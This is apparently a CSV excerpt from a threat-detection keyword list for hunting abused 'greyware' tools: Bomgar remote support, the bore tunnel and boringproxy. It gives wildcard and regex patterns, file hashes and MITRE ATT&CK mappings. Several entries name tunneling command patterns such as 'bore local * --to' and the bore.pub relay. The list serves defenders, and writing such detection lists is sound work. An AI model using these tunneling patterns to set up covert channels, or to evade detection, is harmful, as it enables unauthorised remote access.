"*'TaskName'>\Bomgar Task *",".{0,1000}\'TaskName\'\>\\Bomgar\sTask\s.{0,1000}","greyware_tool_keyword","Bomgar","Bomgar beyoundtrust Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.beyondtrust.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*To: All Representatives  From: Remote Support * has added a note to this session.*",".{0,1000}To\:\sAll\sRepresentatives\s\sFrom\:\sRemote\sSupport\s.{0,1000}\shas\sadded\sa\snote\sto\sthis\ssession\..{0,1000}","greyware_tool_keyword","Bomgar","Bomgar beyoundtrust Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.beyondtrust.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"* install bore-cli*",".{0,1000}\sinstall\sbore\-cli.{0,1000}","greyware_tool_keyword","bore","bore is a simple CLI tool for making tunnels to localhost","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/ekzhang/bore","1","0","N/A","N/A","10","10","8382","333","2024-07-13T20:33:44Z","2022-04-04T02:47:54Z"
"* --to bore.pub*",".{0,1000}\s\-\-to\sbore\.pub.{0,1000}","greyware_tool_keyword","bore","bore is a simple CLI tool for making tunnels to localhost","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/ekzhang/bore","1","0","N/A","N/A","10","10","8382","333","2024-07-13T20:33:44Z","2022-04-04T02:47:54Z"
"*02006756198c02904d534aa215a4382f39b9f182e6fed9d7c2bbb36f3e2c06f6*",".{0,1000}02006756198c02904d534aa215a4382f39b9f182e6fed9d7c2bbb36f3e2c06f6.{0,1000}","greyware_tool_keyword","bore","bore is a simple CLI tool for making tunnels to localhost","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/ekzhang/bore","1","0","#filehash","N/A","10","10","8382","333","2024-07-13T20:33:44Z","2022-04-04T02:47:54Z"
"*079ba7d752899ae9635cc444d27479b0cd314a39a282d114e9940a26fb9f55e7*",".{0,1000}079ba7d752899ae9635cc444d27479b0cd314a39a282d114e9940a26fb9f55e7.{0,1000}","greyware_tool_keyword","bore","bore is a simple CLI tool for making tunnels to localhost","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/ekzhang/bore","1","0","#filehash","N/A","10","10","8382","333","2024-07-13T20:33:44Z","2022-04-04T02:47:54Z"
"*0c2294231827539891a70bd5b7657c7d1d87f53d13f2c609a32f49ca54440797*",".{0,1000}0c2294231827539891a70bd5b7657c7d1d87f53d13f2c609a32f49ca54440797.{0,1000}","greyware_tool_keyword","bore","bore is a simple CLI tool for making tunnels to localhost","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/ekzhang/bore","1","0","#filehash","N/A","10","10","8382","333","2024-07-13T20:33:44Z","2022-04-04T02:47:54Z"
"*24328a6907e7d2783be6817bdd1c2ca6c14aa1cb556caff0e193af56e799ff1a*",".{0,1000}24328a6907e7d2783be6817bdd1c2ca6c14aa1cb556caff0e193af56e799ff1a.{0,1000}","greyware_tool_keyword","bore","bore is a simple CLI tool for making tunnels to localhost","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/ekzhang/bore","1","0","#filehash","N/A","10","10","8382","333","2024-07-13T20:33:44Z","2022-04-04T02:47:54Z"
"*2b5d0530f54a5cb1aa7e037ab075ba27991bafa83a42555d50fde9245a3eb435*",".{0,1000}2b5d0530f54a5cb1aa7e037ab075ba27991bafa83a42555d50fde9245a3eb435.{0,1000}","greyware_tool_keyword","bore","bore is a simple CLI tool for making tunnels to localhost","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/ekzhang/bore","1","0","#filehash","N/A","10","10","8382","333","2024-07-13T20:33:44Z","2022-04-04T02:47:54Z"
"*32dc4748174790882d0d962dd7b5a6bf332cb8cd6c8ccf8d75d9ec5cd703274a*",".{0,1000}32dc4748174790882d0d962dd7b5a6bf332cb8cd6c8ccf8d75d9ec5cd703274a.{0,1000}","greyware_tool_keyword","bore","bore is a simple CLI tool for making tunnels to localhost","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/ekzhang/bore","1","0","#filehash","N/A","10","10","8382","333","2024-07-13T20:33:44Z","2022-04-04T02:47:54Z"
"*33de7cf074cc9aa8850b99ef61fb64e490cdf04f0231d76988b207b3d09cbdae*",".{0,1000}33de7cf074cc9aa8850b99ef61fb64e490cdf04f0231d76988b207b3d09cbdae.{0,1000}","greyware_tool_keyword","bore","bore is a simple CLI tool for making tunnels to localhost","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/ekzhang/bore","1","0","#filehash","N/A","10","10","8382","333","2024-07-13T20:33:44Z","2022-04-04T02:47:54Z"
"*37206e26ef07932cdc1c9f37bb28242b85c7c895bfcfa0b58c48875e0979daf3*",".{0,1000}37206e26ef07932cdc1c9f37bb28242b85c7c895bfcfa0b58c48875e0979daf3.{0,1000}","greyware_tool_keyword","bore","bore is a simple CLI tool for making tunnels to localhost","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/ekzhang/bore","1","0","#filehash","N/A","10","10","8382","333","2024-07-13T20:33:44Z","2022-04-04T02:47:54Z"
"*418ad6ef7472d4a0d275bb3912b5c1498e26efd801344f581f6eb63e1076e2c4*",".{0,1000}418ad6ef7472d4a0d275bb3912b5c1498e26efd801344f581f6eb63e1076e2c4.{0,1000}","greyware_tool_keyword","bore","bore is a simple CLI tool for making tunnels to localhost","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/ekzhang/bore","1","0","#filehash","N/A","10","10","8382","333","2024-07-13T20:33:44Z","2022-04-04T02:47:54Z"
"*466de31afaad2ff25fb1e080ec326c31d4d08bc8639b2c957f3f02f2e5900139*",".{0,1000}466de31afaad2ff25fb1e080ec326c31d4d08bc8639b2c957f3f02f2e5900139.{0,1000}","greyware_tool_keyword","bore","bore is a simple CLI tool for making tunnels to localhost","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/ekzhang/bore","1","0","#filehash","N/A","10","10","8382","333","2024-07-13T20:33:44Z","2022-04-04T02:47:54Z"
"*4bc74cda62178ccf38917109af3b74d7612ac1fbc234d9c69f0be49e5b7425ce*",".{0,1000}4bc74cda62178ccf38917109af3b74d7612ac1fbc234d9c69f0be49e5b7425ce.{0,1000}","greyware_tool_keyword","bore","bore is a simple CLI tool for making tunnels to localhost","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/ekzhang/bore","1","0","#filehash","N/A","10","10","8382","333","2024-07-13T20:33:44Z","2022-04-04T02:47:54Z"
"*568ec361aa33903f8cf1678a5b35592887ea6e3de3fae6a1f752730ca2e8e82c*",".{0,1000}568ec361aa33903f8cf1678a5b35592887ea6e3de3fae6a1f752730ca2e8e82c.{0,1000}","greyware_tool_keyword","bore","bore is a simple CLI tool for making tunnels to localhost","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/ekzhang/bore","1","0","#filehash","N/A","10","10","8382","333","2024-07-13T20:33:44Z","2022-04-04T02:47:54Z"
"*66ae97d291d0e2d0dae8a8642fb8d2872a6dd0183aff325b7eaedcc911284741*",".{0,1000}66ae97d291d0e2d0dae8a8642fb8d2872a6dd0183aff325b7eaedcc911284741.{0,1000}","greyware_tool_keyword","bore","bore is a simple CLI tool for making tunnels to localhost","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/ekzhang/bore","1","0","#filehash","N/A","10","10","8382","333","2024-07-13T20:33:44Z","2022-04-04T02:47:54Z"
"*703e2d2c0fa3fb1e6b7f1a5249533072d9d9caeaf7811dbe1750ee43c1ef0501*",".{0,1000}703e2d2c0fa3fb1e6b7f1a5249533072d9d9caeaf7811dbe1750ee43c1ef0501.{0,1000}","greyware_tool_keyword","bore","bore is a simple CLI tool for making tunnels to localhost","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/ekzhang/bore","1","0","#filehash","N/A","10","10","8382","333","2024-07-13T20:33:44Z","2022-04-04T02:47:54Z"
"*7f36205ce8bfa40c35723afeee04f94c3a3c978b6076c321b6d108d4c7f04963*",".{0,1000}7f36205ce8bfa40c35723afeee04f94c3a3c978b6076c321b6d108d4c7f04963.{0,1000}","greyware_tool_keyword","bore","bore is a simple CLI tool for making tunnels to localhost","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/ekzhang/bore","1","0","#filehash","N/A","10","10","8382","333","2024-07-13T20:33:44Z","2022-04-04T02:47:54Z"
"*a583e31f6c18a593b681896402295f35a903df7bc34faae45914679b3e9751b9*",".{0,1000}a583e31f6c18a593b681896402295f35a903df7bc34faae45914679b3e9751b9.{0,1000}","greyware_tool_keyword","bore","bore is a simple CLI tool for making tunnels to localhost","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/ekzhang/bore","1","0","#filehash","N/A","10","10","8382","333","2024-07-13T20:33:44Z","2022-04-04T02:47:54Z"
"*ad5c1453508585d413c083df1571738ae1158b7a83aeab24c456548fb0e4cdbd*",".{0,1000}ad5c1453508585d413c083df1571738ae1158b7a83aeab24c456548fb0e4cdbd.{0,1000}","greyware_tool_keyword","bore","bore is a simple CLI tool for making tunnels to localhost","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/ekzhang/bore","1","0","#filehash","N/A","10","10","8382","333","2024-07-13T20:33:44Z","2022-04-04T02:47:54Z"
"*ae37bedf1ad63fabd9843da4dc3598e80bc135b820555842cc20cad4f95164ff*",".{0,1000}ae37bedf1ad63fabd9843da4dc3598e80bc135b820555842cc20cad4f95164ff.{0,1000}","greyware_tool_keyword","bore","bore is a simple CLI tool for making tunnels to localhost","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/ekzhang/bore","1","0","#filehash","N/A","10","10","8382","333","2024-07-13T20:33:44Z","2022-04-04T02:47:54Z"
"*ba68f7b9e8eb49325a28ed27d1ff542919952145af371b144cc7effdd0d561d9*",".{0,1000}ba68f7b9e8eb49325a28ed27d1ff542919952145af371b144cc7effdd0d561d9.{0,1000}","greyware_tool_keyword","bore","bore is a simple CLI tool for making tunnels to localhost","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/ekzhang/bore","1","0","#filehash","N/A","10","10","8382","333","2024-07-13T20:33:44Z","2022-04-04T02:47:54Z"
"*bb25b3f72e24573d9695f7bb677500a695ad46ce61b61dae5d13fb035ce071c2*",".{0,1000}bb25b3f72e24573d9695f7bb677500a695ad46ce61b61dae5d13fb035ce071c2.{0,1000}","greyware_tool_keyword","bore","bore is a simple CLI tool for making tunnels to localhost","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/ekzhang/bore","1","0","#filehash","N/A","10","10","8382","333","2024-07-13T20:33:44Z","2022-04-04T02:47:54Z"
"*bea23804b59ef8bc8cbd4e03054e2b89baccf01b2640013e3b1b7db85c5f6b2e*",".{0,1000}bea23804b59ef8bc8cbd4e03054e2b89baccf01b2640013e3b1b7db85c5f6b2e.{0,1000}","greyware_tool_keyword","bore","bore is a simple CLI tool for making tunnels to localhost","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/ekzhang/bore","1","0","#filehash","N/A","10","10","8382","333","2024-07-13T20:33:44Z","2022-04-04T02:47:54Z"
"*bore local * --to *",".{0,1000}bore\slocal\s.{0,1000}\s\-\-to\s.{0,1000}","greyware_tool_keyword","bore","bore is a simple CLI tool for making tunnels to localhost","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/ekzhang/bore","1","0","N/A","N/A","10","10","8382","333","2024-07-13T20:33:44Z","2022-04-04T02:47:54Z"
"*bore server --secret *",".{0,1000}bore\sserver\s\-\-secret\s.{0,1000}","greyware_tool_keyword","bore","bore is a simple CLI tool for making tunnels to localhost","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/ekzhang/bore","1","0","N/A","N/A","10","10","8382","333","2024-07-13T20:33:44Z","2022-04-04T02:47:54Z"
"*c9bdea295fc4e88e634edc48697912379334da2c771e6130dc1702e32e70672c*",".{0,1000}c9bdea295fc4e88e634edc48697912379334da2c771e6130dc1702e32e70672c.{0,1000}","greyware_tool_keyword","bore","bore is a simple CLI tool for making tunnels to localhost","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/ekzhang/bore","1","0","#filehash","N/A","10","10","8382","333","2024-07-13T20:33:44Z","2022-04-04T02:47:54Z"
"*c9e87a3b55c42f86a7fbbb0bd11063d7d601988d8a31db7cf1b7c827654b0dc6*",".{0,1000}c9e87a3b55c42f86a7fbbb0bd11063d7d601988d8a31db7cf1b7c827654b0dc6.{0,1000}","greyware_tool_keyword","bore","bore is a simple CLI tool for making tunnels to localhost","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/ekzhang/bore","1","0","#filehash","N/A","10","10","8382","333","2024-07-13T20:33:44Z","2022-04-04T02:47:54Z"
"*ekzhang/bore*",".{0,1000}ekzhang\/bore.{0,1000}","greyware_tool_keyword","bore","bore is a simple CLI tool for making tunnels to localhost","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/ekzhang/bore","1","1","N/A","N/A","10","10","8382","333","2024-07-13T20:33:44Z","2022-04-04T02:47:54Z"
"*f606f2a59706479d9cab36d16b9c241e204edb46540c92333521872dfcda025f*",".{0,1000}f606f2a59706479d9cab36d16b9c241e204edb46540c92333521872dfcda025f.{0,1000}","greyware_tool_keyword","bore","bore is a simple CLI tool for making tunnels to localhost","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/ekzhang/bore","1","0","#filehash","N/A","10","10","8382","333","2024-07-13T20:33:44Z","2022-04-04T02:47:54Z"
"*http://bore.pub/*",".{0,1000}http\:\/\/bore\.pub\/.{0,1000}","greyware_tool_keyword","bore","bore is a simple CLI tool for making tunnels to localhost","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/ekzhang/bore","1","1","N/A","N/A","10","10","8382","333","2024-07-13T20:33:44Z","2022-04-04T02:47:54Z"
"* boringproxy-client.service*",".{0,1000}\sboringproxy\-client\.service.{0,1000}","greyware_tool_keyword","boringproxy","Simple tunneling reverse proxy with a fast web UI and auto HTTPS. Designed for self-hosters.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/boringproxy/boringproxy","1","0","N/A","N/A","10","10","1190","112","2024-07-06T10:13:37Z","2020-09-26T21:58:07Z"
"* boringproxy-server.service*",".{0,1000}\sboringproxy\-server\.service.{0,1000}","greyware_tool_keyword","boringproxy","Simple tunneling reverse proxy with a fast web UI and auto HTTPS. Designed for self-hosters.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/boringproxy/boringproxy","1","0","N/A","N/A","10","10","1190","112","2024-07-06T10:13:37Z","2020-09-26T21:58:07Z"
"* -m boringproxy*",".{0,1000}\s\-m\sboringproxy.{0,1000}","greyware_tool_keyword","boringproxy","Simple tunneling reverse proxy with a fast web UI and auto HTTPS. Designed for self-hosters.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/boringproxy/boringproxy","1","0","N/A","N/A","10","10","1190","112","2024-07-06T10:13:37Z","2020-09-26T21:58:07Z"
"*./boringproxy server*",".{0,1000}\.\/boringproxy\sserver.{0,1000}","greyware_tool_keyword","boringproxy","Simple tunneling reverse proxy with a fast web UI and auto HTTPS. Designed for self-hosters.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/boringproxy/boringproxy","1","0","N/A","N/A","10","10","1190","112","2024-07-06T10:13:37Z","2020-09-26T21:58:07Z"
"*/bin/boringproxy*",".{0,1000}\/bin\/boringproxy.{0,1000}","greyware_tool_keyword","boringproxy","Simple tunneling reverse proxy with a fast web UI and auto HTTPS. Designed for self-hosters.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/boringproxy/boringproxy","1","0","N/A","N/A","10","10","1190","112","2024-07-06T10:13:37Z","2020-09-26T21:58:07Z"
"*/boringproxy.git*",".{0,1000}\/boringproxy\.git.{0,1000}","greyware_tool_keyword","boringproxy","Simple tunneling reverse proxy with a fast web UI and auto HTTPS. Designed for self-hosters.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/boringproxy/boringproxy","1","1","N/A","N/A","10","10","1190","112","2024-07-06T10:13:37Z","2020-09-26T21:58:07Z"
"*/boringproxy-client.service*",".{0,1000}\/boringproxy\-client\.service.{0,1000}","greyware_tool_keyword","boringproxy","Simple tunneling reverse proxy with a fast web UI and auto HTTPS. Designed for self-hosters.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/boringproxy/boringproxy","1","1","N/A","N/A","10","10","1190","112","2024-07-06T10:13:37Z","2020-09-26T21:58:07Z"
"*/boringproxy-server.service*",".{0,1000}\/boringproxy\-server\.service.{0,1000}","greyware_tool_keyword","boringproxy","Simple tunneling reverse proxy with a fast web UI and auto HTTPS. Designed for self-hosters.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/boringproxy/boringproxy","1","1","N/A","N/A","10","10","1190","112","2024-07-06T10:13:37Z","2020-09-26T21:58:07Z"
"*/home/boringproxy*",".{0,1000}\/home\/boringproxy.{0,1000}","greyware_tool_keyword","boringproxy","Simple tunneling reverse proxy with a fast web UI and auto HTTPS. Designed for self-hosters.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/boringproxy/boringproxy","1","0","N/A","N/A","10","10","1190","112","2024-07-06T10:13:37Z","2020-09-26T21:58:07Z"
"*/tmp/boringproxy-client*",".{0,1000}\/tmp\/boringproxy\-client.{0,1000}","greyware_tool_keyword","boringproxy","Simple tunneling reverse proxy with a fast web UI and auto HTTPS. Designed for self-hosters.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/boringproxy/boringproxy","1","0","N/A","N/A","10","10","1190","112","2024-07-06T10:13:37Z","2020-09-26T21:58:07Z"
"*23d61c88520628dc2ab58b25e556df92640327ca4f946cd8ea30eb813897d107*",".{0,1000}23d61c88520628dc2ab58b25e556df92640327ca4f946cd8ea30eb813897d107.{0,1000}","greyware_tool_keyword","boringproxy","Simple tunneling reverse proxy with a fast web UI and auto HTTPS. Designed for self-hosters.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/boringproxy/boringproxy","1","0","#filehash","N/A","10","10","1190","112","2024-07-06T10:13:37Z","2020-09-26T21:58:07Z"
"*34362de1defeb018d71e6319afabca362fa4acd69341bfcfb3ce77b6e8c61a6a*",".{0,1000}34362de1defeb018d71e6319afabca362fa4acd69341bfcfb3ce77b6e8c61a6a.{0,1000}","greyware_tool_keyword","boringproxy","Simple tunneling reverse proxy with a fast web UI and auto HTTPS. Designed for self-hosters.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/boringproxy/boringproxy","1","0","#filehash","N/A","10","10","1190","112","2024-07-06T10:13:37Z","2020-09-26T21:58:07Z"
"*403d4848966e4e5e7859758766269a5340f309c641e71f65fd3cf4b01049b8d9*",".{0,1000}403d4848966e4e5e7859758766269a5340f309c641e71f65fd3cf4b01049b8d9.{0,1000}","greyware_tool_keyword","boringproxy","Simple tunneling reverse proxy with a fast web UI and auto HTTPS. Designed for self-hosters.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/boringproxy/boringproxy","1","0","#filehash","N/A","10","10","1190","112","2024-07-06T10:13:37Z","2020-09-26T21:58:07Z"
"*47532247f32b7a9f42b0dfe5a1314a674e92deef79eaab647af34507a677d375*",".{0,1000}47532247f32b7a9f42b0dfe5a1314a674e92deef79eaab647af34507a677d375.{0,1000}","greyware_tool_keyword","boringproxy","Simple tunneling reverse proxy with a fast web UI and auto HTTPS. Designed for self-hosters.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/boringproxy/boringproxy","1","0","#filehash","N/A","10","10","1190","112","2024-07-06T10:13:37Z","2020-09-26T21:58:07Z"
"*5805e0f064ce3aa72e5a0b4dd00c0bf4150995cb1f1b7b80f2b3a78da78d1d27*",".{0,1000}5805e0f064ce3aa72e5a0b4dd00c0bf4150995cb1f1b7b80f2b3a78da78d1d27.{0,1000}","greyware_tool_keyword","boringproxy","Simple tunneling reverse proxy with a fast web UI and auto HTTPS. Designed for self-hosters.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/boringproxy/boringproxy","1","0","#filehash","N/A","10","10","1190","112","2024-07-06T10:13:37Z","2020-09-26T21:58:07Z"
"*7a778797dd640eb51defe912e8b6872df92241927193106590a2ccb92a5dc926*",".{0,1000}7a778797dd640eb51defe912e8b6872df92241927193106590a2ccb92a5dc926.{0,1000}","greyware_tool_keyword","boringproxy","Simple tunneling reverse proxy with a fast web UI and auto HTTPS. Designed for self-hosters.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/boringproxy/boringproxy","1","0","#filehash","N/A","10","10","1190","112","2024-07-06T10:13:37Z","2020-09-26T21:58:07Z"
"*828ee46c07c36e54f11e38f01898e3bd215739c28bbcf05606abe00ba0c6c51f*",".{0,1000}828ee46c07c36e54f11e38f01898e3bd215739c28bbcf05606abe00ba0c6c51f.{0,1000}","greyware_tool_keyword","boringproxy","Simple tunneling reverse proxy with a fast web UI and auto HTTPS. Designed for self-hosters.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/boringproxy/boringproxy","1","0","#filehash","N/A","10","10","1190","112","2024-07-06T10:13:37Z","2020-09-26T21:58:07Z"
"*89bd3a31299f6bbf9be9bcf5f1456c11333590290626f11017079fd84ee58ca1*",".{0,1000}89bd3a31299f6bbf9be9bcf5f1456c11333590290626f11017079fd84ee58ca1.{0,1000}","greyware_tool_keyword","boringproxy","Simple tunneling reverse proxy with a fast web UI and auto HTTPS. Designed for self-hosters.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/boringproxy/boringproxy","1","0","#filehash","N/A","10","10","1190","112","2024-07-06T10:13:37Z","2020-09-26T21:58:07Z"
"*9a688243e33a6cddb1bb4807277e352118141e7321385024cbff655a00b7b660*",".{0,1000}9a688243e33a6cddb1bb4807277e352118141e7321385024cbff655a00b7b660.{0,1000}","greyware_tool_keyword","boringproxy","Simple tunneling reverse proxy with a fast web UI and auto HTTPS. Designed for self-hosters.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/boringproxy/boringproxy","1","0","#filehash","N/A","10","10","1190","112","2024-07-06T10:13:37Z","2020-09-26T21:58:07Z"
"*a262487a6bac019c52f1ada940aa357f0be3c69cf1232a052115e74723a65ade*",".{0,1000}a262487a6bac019c52f1ada940aa357f0be3c69cf1232a052115e74723a65ade.{0,1000}","greyware_tool_keyword","boringproxy","Simple tunneling reverse proxy with a fast web UI and auto HTTPS. Designed for self-hosters.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/boringproxy/boringproxy","1","0","#filehash","N/A","10","10","1190","112","2024-07-06T10:13:37Z","2020-09-26T21:58:07Z"
"*b4f3bc92ccedfbb0714c662c8d6a7842e71f1ebb2d8392ec5064b314dd5dede5*",".{0,1000}b4f3bc92ccedfbb0714c662c8d6a7842e71f1ebb2d8392ec5064b314dd5dede5.{0,1000}","greyware_tool_keyword","boringproxy","Simple tunneling reverse proxy with a fast web UI and auto HTTPS. Designed for self-hosters.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/boringproxy/boringproxy","1","0","#filehash","N/A","10","10","1190","112","2024-07-06T10:13:37Z","2020-09-26T21:58:07Z"
"*boringproxy client -server *",".{0,1000}boringproxy\sclient\s\-server\s.{0,1000}","greyware_tool_keyword","boringproxy","Simple tunneling reverse proxy with a fast web UI and auto HTTPS. Designed for self-hosters.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/boringproxy/boringproxy","1","0","N/A","N/A","10","10","1190","112","2024-07-06T10:13:37Z","2020-09-26T21:58:07Z"
"*boringproxy/boringproxy*",".{0,1000}boringproxy\/boringproxy.{0,1000}","greyware_tool_keyword","boringproxy","Simple tunneling reverse proxy with a fast web UI and auto HTTPS. Designed for self-hosters.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/boringproxy/boringproxy","1","1","N/A","N/A","10","10","1190","112","2024-07-06T10:13:37Z","2020-09-26T21:58:07Z"
"*boringproxy_db.json*",".{0,1000}boringproxy_db\.json.{0,1000}","greyware_tool_keyword","boringproxy","Simple tunneling reverse proxy with a fast web UI and auto HTTPS. Designed for self-hosters.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/boringproxy/boringproxy","1","1","N/A","N/A","10","10","1190","112","2024-07-06T10:13:37Z","2020-09-26T21:58:07Z"
"*boringproxy-client@default.service*",".{0,1000}boringproxy\-client\@default\.service.{0,1000}","greyware_tool_keyword","boringproxy","Simple tunneling reverse proxy with a fast web UI and auto HTTPS. Designed for self-hosters.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/boringproxy/boringproxy","1","0","N/A","N/A","10","10","1190","112","2024-07-06T10:13:37Z","2020-09-26T21:58:07Z"
"*chown boringproxy:boringproxy *",".{0,1000}chown\sboringproxy\:boringproxy\s.{0,1000}","greyware_tool_keyword","boringproxy","Simple tunneling reverse proxy with a fast web UI and auto HTTPS. Designed for self-hosters.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/boringproxy/boringproxy","1","0","N/A","N/A","10","10","1190","112","2024-07-06T10:13:37Z","2020-09-26T21:58:07Z"
"*cmd/boringproxy*",".{0,1000}cmd\/boringproxy.{0,1000}","greyware_tool_keyword","boringproxy","Simple tunneling reverse proxy with a fast web UI and auto HTTPS. Designed for self-hosters.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/boringproxy/boringproxy","1","1","N/A","N/A","10","10","1190","112","2024-07-06T10:13:37Z","2020-09-26T21:58:07Z"
"*f2915f5a3885391738923ecd18faf840074c65cd2e390e1474a4d84ce315b9ff*",".{0,1000}f2915f5a3885391738923ecd18faf840074c65cd2e390e1474a4d84ce315b9ff.{0,1000}","greyware_tool_keyword","boringproxy","Simple tunneling reverse proxy with a fast web UI and auto HTTPS. Designed for self-hosters.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/boringproxy/boringproxy","1","0","#filehash","N/A","10","10","1190","112","2024-07-06T10:13:37Z","2020-09-26T21:58:07Z"
"*f5b42d933cea4d53aa975039de0cb1053287fac5ce4377d2afb663e26a5d22dd*",".{0,1000}f5b42d933cea4d53aa975039de0cb1053287fac5ce4377d2afb663e26a5d22dd.{0,1000}","greyware_tool_keyword","boringproxy","Simple tunneling reverse proxy with a fast web UI and auto HTTPS. Designed for self-hosters.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/boringproxy/boringproxy","1","0","#filehash","N/A","10","10","1190","112","2024-07-06T10:13:37Z","2020-09-26T21:58:07Z"
"*groupadd boringproxy*",".{0,1000}groupadd\sboringproxy.{0,1000}","greyware_tool_keyword","boringproxy","Simple tunneling reverse proxy with a fast web UI and auto HTTPS. Designed for self-hosters.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/boringproxy/boringproxy","1","0","N/A","N/A","10","10","1190","112","2024-07-06T10:13:37Z","2020-09-26T21:58:07Z"
"*https://boringproxy.io/installation*",".{0,1000}https\:\/\/boringproxy\.io\/installation.{0,1000}","greyware_tool_keyword","boringproxy","Simple tunneling reverse proxy with a fast web UI and auto HTTPS. Designed for self-hosters.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/boringproxy/boringproxy","1","1","N/A","N/A","10","10","1190","112","2024-07-06T10:13:37Z","2020-09-26T21:58:07Z"
"*pkill -u boringproxy*",".{0,1000}pkill\s\-u\sboringproxy.{0,1000}","greyware_tool_keyword","boringproxy","Simple tunneling reverse proxy with a fast web UI and auto HTTPS. Designed for self-hosters.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/boringproxy/boringproxy","1","0","N/A","N/A","10","10","1190","112","2024-07-06T10:13:37Z","2020-09-26T21:58:07Z"
"*runuser -l boringproxy *",".{0,1000}runuser\s\-l\sboringproxy\s.{0,1000}","greyware_tool_keyword","boringproxy","Simple tunneling reverse proxy with a fast web UI and auto HTTPS. Designed for self-hosters.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/boringproxy/boringproxy","1","0","N/A","N/A","10","10","1190","112","2024-07-06T10:13:37Z","2020-09-26T21:58:07Z"
